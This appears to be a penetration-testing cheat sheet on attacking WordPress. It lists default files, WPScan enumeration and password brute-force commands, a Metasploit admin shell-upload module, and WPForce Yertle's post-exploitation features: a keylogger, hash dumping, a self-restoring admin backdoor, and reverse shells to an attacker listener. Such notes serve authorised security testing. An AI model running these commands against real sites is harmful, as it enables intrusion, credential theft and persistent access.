InfoSec Notes

WordPress

Overview

WordPress is a free and open-source content management system (CMS), developed by the WordPress.org foundation and based on PHP and MySQL.

WordPress is, by far, the most popular website management system in use, with a CMS market share of nearly sixty percent; it is used by more than 60 million websites, including 30.6% of the top 10 million websites as of April 2018.

WordPress' plugin architecture allows users to extend the features and functionality of a website or blog. As of March 2017, over 55,286 plugins were available.

WordPress default URL

The following files and directories can be found on a default installation of WordPress:

index.php
license.txt
readme.html
wp-activate.php
wp-admin
wp-app.php
wp-atom.php
wp-blog-header.php
wp-comments-post.php
wp-commentsrss2.php
wp-config-sample.php
wp-content
wp-cron.php
wp-feed.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-pass.php
wp-rdf.php
wp-register.php
wp-rss2.php
wp-rss.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
...

Refer to the SecLists wordlist Discovery/Web-Content/CMS/wordpress.fuzz.txt for a more exhaustive list of URLs.

WPScan

WPScan is a well-known WordPress vulnerability scanner written in Ruby, which focuses on vulnerabilities in the WordPress core, themes and plugins.

The WPScan vulnerability database is public and counted 11665 vulnerabilities as of December 2018. The database is hosted at:

https://wpvulndb.com/

Usage:

# Update the WordPress core, themes and plugins vulnerability database
wpscan --update

# Default scan of a single target
wpscan --url <URL>

# Enumerate installed plugins | themes | users | timthumbs
wpscan --url <URL> --enumerate < p | t | u | tt >

# Wordlist password brute force on enumerated users using 50 threads
# (WPScan v2 syntax; in WPScan v3 the equivalent options are --passwords and --max-threads, as used in the interlace command below)
wpscan --url <URL> --wordlist <WORDLIST_PASSWORDS> --threads 50

# Wordlist usernames and password brute force using 50 threads
wpscan --url <URL> [--username <USERNAME> | --usernames <WORDLIST_USERNAMES>] --wordlist <WORDLIST_PASSWORDS> --threads 50

# Multiple targets scan (all plugins, all themes, config backups, db exports, user enumeration, and password bruteforce) using interlace.
echo 'wpscan --disable-tls-checks --rua --force --max-threads 50 -e ap,at,cb,dbe,u,m --plugins-detection aggressive --detection-mode aggressive --passwords <PASSWORD_WORDLIST> -o _output_/_cleantarget_-wpscan.txt --url _target_' > wordpress_cmd.txt
interlace -tL <WORDPRESS_HOSTS_FILE> -o <OUTPUT_DIRECTORY> -cL wordpress_cmd.txt

Administrator to RCE

The tools presented below require valid WordPress administrator credentials.

Metasploit

The Metasploit module exploit/unix/webapp/wp_admin_shell_upload can be used to generate a plugin packed with a Metasploit payload and upload it to the WordPress server.

msf> use exploit/unix/webapp/wp_admin_shell_upload

WPForce Yertle

Part of the WPForce suite of WordPress attack tools, Yertle is a WordPress post-exploitation Python script.

The following modules are implemented:

beef            Injects a BeEF hook into website
dbcreds         Prints the database credentials
exit            Terminate the session
hashdump        Dumps all WordPress password hashes
help            Help menu
keylogger       Patches WordPress core to log plaintext credentials
keylog          Displays keylog file
meterpreter     Executes a PHP meterpreter stager (php/meterpreter/reverse_tcp) to connect to metasploit
persist         Creates an admin account that will re-add itself
quit            Terminate the session
shell           Sends a TCP reverse shell to a netcat listener
stealth         Hides Yertle from the plugins page

Usage:

# Bind OS shell including the modules above
python yertle.py -u <USERNAME> -p <PASSWORD> -t <URL> -i
os-shell> help | hashdump | persist | whoami | ...

# Reverse OS shell - works with a netcat listener
python yertle.py -u <USERNAME> -p <PASSWORD> -t <URL> -r -li <LHOST> -lp <LPORT>